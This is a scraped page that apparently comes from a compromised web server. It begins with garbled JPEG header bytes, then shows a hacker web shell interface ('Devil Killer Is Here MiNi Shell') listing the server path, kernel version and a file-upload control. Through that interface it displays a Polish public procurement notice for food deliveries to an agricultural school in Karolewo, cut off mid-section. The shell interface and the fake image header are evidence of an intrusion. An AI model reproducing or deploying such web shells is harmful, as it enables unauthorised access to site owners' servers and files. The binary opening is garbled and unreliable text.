JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210830/0016323201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Sukcesywna dostawa żywności dla Zespołu Szkół Centrum Kształcenia Rolniczego w Karolewie”<br/>(trzecie postępowanie) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Rolniczego w Karolewie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZSCKR w Karolewie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 280260652</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Karolewo 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kętrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(0-89) 752-47-53</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(0-89) 752-40-42</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zsckr@karolewo.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.karolewo.com/bip</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna podległa i nadzorowana przez Ministra Rolnictwa i Rwozoju Wsi </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Sukcesywna dostawa żywności dla Zespołu Szkół Centrum Kształcenia Rolniczego w Karolewie”<br/>(trzecie postępowanie) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b35bc31-0707-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00163232</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00013324/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa żywności dla Zespołu Szkół Centrum Kształcenia Rolniczego w Karolewie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.karolewo.com/bip <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">VI.1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAP (Elektroniczna Skrzynka Podawcza- Identyfikator w ePUAP –<br/>ZSCKRwKarolewie), https://epuap.gov.pl/wps/portal oraz poczty elektronicznej e-mail:<br/>renataolechnowicz.zsckr@karolewo.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">VI.1) W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa<br/>się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAP (Elektroniczna Skrzynka Podawcza-<br/>Identyfikator w ePUAP – ZSCKRwKarolewie), https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej e-mail: renataolechnowicz.zsckr@karolewo.com<br/>VI.2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy:<br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>VI.3) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>VI.4) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150.<br/>MB.<br/>VI.5) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>VI.6) Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do SWZ.<br/>Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>VI.7) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami<br/>w szczególności składanie oświadczeń, wniosków (innych niż wniosków o dopuszczenie do udziału w<br/>postępowaniu), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>VI.8) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email renataolechnowicz.zsckr@karolewo.com poza złożeniem oferty, która musi być złożona przez<br/>mini portal.<br/>VI.9) Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt VI.8) adres email. Sposób<br/>sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od Wykonawcy.<br/>VI.10) Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż<br/>przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>VI.11) Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>Wnioski o wyjaśnienie treści SWZ zaleca się przesyłać w formie umożliwiającej kopiowanie treści<br/>pisma i wklejenie jej do innego dokumentu.<br/>Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania<br/>Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• Administratorem Pani/Pana danych osobowych jest Zespół Szkół Centrum Kształcenia Rolniczego w<br/>Karolewie, Karolewo12, 11-400 Kętrzyn, zsckr@karolewo.com<br/>• Inspektor Ochrony Danych, z którym może Pani/Pan się skontaktować w przypadku jakichkolwiek<br/>pytań lub uwag dotyczących przetwarzania Pani/Pana danych osobowych i praw przysługujących<br/>Pani/Panu na mocy przepisów o ochronie danych osobowych. Dane kontaktowe:<br/>adres e-mail: zsckr@karolewo.com<br/>Tel (0-89) 752- 47-53<br/>Fax. (0-89) 752-40-42<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celuzwiązanym<br/>z postępowaniem o udzielenie zamówienia publicznego „Sukcesywna dostawa żywności dla Zespołu Szkół Centrum Kształcenia Rolniczego w Karolewie”,<br/>prowadzonym w trybie podstawowym, na podstawie art. 275 pkt 1 Ustawy Pzp;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych, dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **1;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO2;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">ZGODNIE Z PUNKTEM 3.15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCKR/7/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczna części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres parametrów i wymagań dla przedmiotu Zamówienia opisany został w<br/>formularzu asortymentowym - szczegółowa oferta cenowa - załącznik 1A do SWZ - wymagania<br/>określone na podstawie art. 218 ust. 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ZAMÓWIENIE Z PRAWEM OPCJI zgodnie z art. 441 Ustawy Pzp – Zamawiający zastrzega<br/>sobie, że określił ilość przedmiotu Zamówienia niezbędną do obliczenia ceny przez<br/>Wykonawcę(zamówienie podstawowe). Jednocześnie korzystając z prawa opcji w trakcie<br/>realizacji Umowy -Zamawiający dopuszcza możliwość jednostronnego zwiększenia lub<br/>zmniejszenia przez siebiewartości Umowy w granicach +20% (zamówienie maksymalne opcja<br/>120%) / albo -30%(zamówienie minimalne opcja 70%) - poprzez zwiększenie lub zmniejszenie<br/>ilości zamówionego Towaru, przy zachowaniu jego cen jednostkowych. Okoliczności związane z<br/>uruchomieniem opcji plus albo minus – mogą być spowodowane, w szczególności, spadkiem lub<br/>wzrostem liczby uczniów, a tym samym ilości wykonywanych procedur z użyciem Towaru.<br/>Możliwość skorzystania z prawa opcji przez Zamawiającego opisana została w załączniku nr 3<br/>do SWZ -projektowane postanowienia umowy w sprawie zamówienia publicznego <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XIV.1) Zamawiający do etapu oceny ofert pod względem ustalonych w<br/>pkt. XIV.2) kryteriów zakwalifikuje oferty spełniające następujące wymagania:<br/>XIV.1.1) oferta została złożona w określonym przez Zamawiającego terminie,<br/>XIV.1.2) złożone przez Wykonawcę dokumenty (oświadczenia) potwierdzają spełnianie przez niego<br/>warunków udziału w Postępowaniu określone w SWZ,<br/>XIV.1.3) złożone oświadczenia i wymagane dokumenty są aktualne, zostały złożone w odpowiedniej<br/>formie i są podpisane przez osoby uprawnione do reprezentowania Wykonawcy,<br/>XIV.1.4) oferta nie podlega odrzuceniu.<br/>XIV.2) Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, z uwagi na fakt,<br/>iż Zamawiający w opisie przedmiotu zamówienia określił wymagania jakościowe<br/>odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia.<br/>XIV.3) Ocena ofert dokonywana będzie w ramach poszczególnych części. XIV.4) Za najkorzystniejszą<br/>zostanie uznana oferta z najniższą ceną.<br/>XIV.5) Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty<br/>o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie<br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>XIV.6) Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług, dla<br/>celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę<br/>podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>XIV.7) W ofercie, o której mowa w pkt. XIV.6), Wykonawca ma obowiązek:<br/>XIV.7.1) poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u<br/>Zamawiającego obowiązku podatkowego;XIV.7.2) wskazania nazwy (rodzaju) towaru lub usługi,<br/>których dostawa lub świadczenie będą<br/>prowadziły do powstania obowiązku podatkowego;<br/>XIV.7.3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego,<br/>bez kwoty podatku;<br/>Ogłoszenie nr 2021/BZP 00145416/01 z dnia 2021-08-11<br/>2021-08-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>XIV.7.4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie<br/>miała zastosowanie.<br/>XIV.8) Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>XIV.9) Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający<br/>wezwie Wykonawcę, którego oferta otrzymała najwyższy ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>XIV.10) W przypadku braku zgody, o której mowa w pkt. XIV.9), oferta podlega odrzuceniu, a<br/>Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres parametrów i wymagań dla przedmiotu Zamówienia opisany został w<br/>formularzu asortymentowym - szczegółowa oferta cenowa - załącznik 1A do SWZ - wymagania<br/>określone na podstawie art. 218 ust. 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ZAMÓWIENIE Z PRAWEM OPCJI zgodnie z art. 441 Ustawy Pzp – Zamawiający zastrzega<br/>sobie, że określił ilość przedmiotu Zamówienia niezbędną do obliczenia ceny przez<br/>Wykonawcę(zamówienie podstawowe). Jednocześnie korzystając z prawa opcji w trakcie<br/>realizacji Umowy -Zamawiający dopuszcza możliwość jednostronnego zwiększenia lub<br/>zmniejszenia przez siebiewartości Umowy w granicach +20% (zamówienie maksymalne opcja<br/>120%) / albo -30%(zamówienie minimalne opcja 70%) - poprzez zwiększenie lub zmniejszenie<br/>ilości zamówionego Towaru, przy zachowaniu jego cen jednostkowych. Okoliczności związane z<br/>uruchomieniem opcji plus albo minus – mogą być spowodowane, w szczególności, spadkiem lub<br/>wzrostem liczby uczniów, a tym samym ilości wykonywanych procedur z użyciem Towaru.<br/>Możliwość skorzystania z prawa opcji przez Zamawiającego opisana została w załączniku nr 3<br/>do SWZ -projektowane postanowienia umowy w sprawie zamówienia publicznego <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XIV.1) Zamawiający do etapu oceny ofert pod względem ustalonych w<br/>pkt. XIV.2) kryteriów zakwalifikuje oferty spełniające następujące wymagania:<br/>XIV.1.1) oferta została złożona w określonym przez Zamawiającego terminie,<br/>XIV.1.2) złożone przez Wykonawcę dokumenty (oświadczenia) potwierdzają spełnianie przez niego<br/>warunków udziału w Postępowaniu określone w SWZ,<br/>XIV.1.3) złożone oświadczenia i wymagane dokumenty są aktualne, zostały złożone w odpowiedniej<br/>formie i są podpisane przez osoby uprawnione do reprezentowania Wykonawcy,<br/>XIV.1.4) oferta nie podlega odrzuceniu.<br/>XIV.2) Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, z uwagi na fakt,<br/>iż Zamawiający w opisie przedmiotu zamówienia określił wymagania jakościowe<br/>odnoszące się do co najmniej głównych elementów składających się na 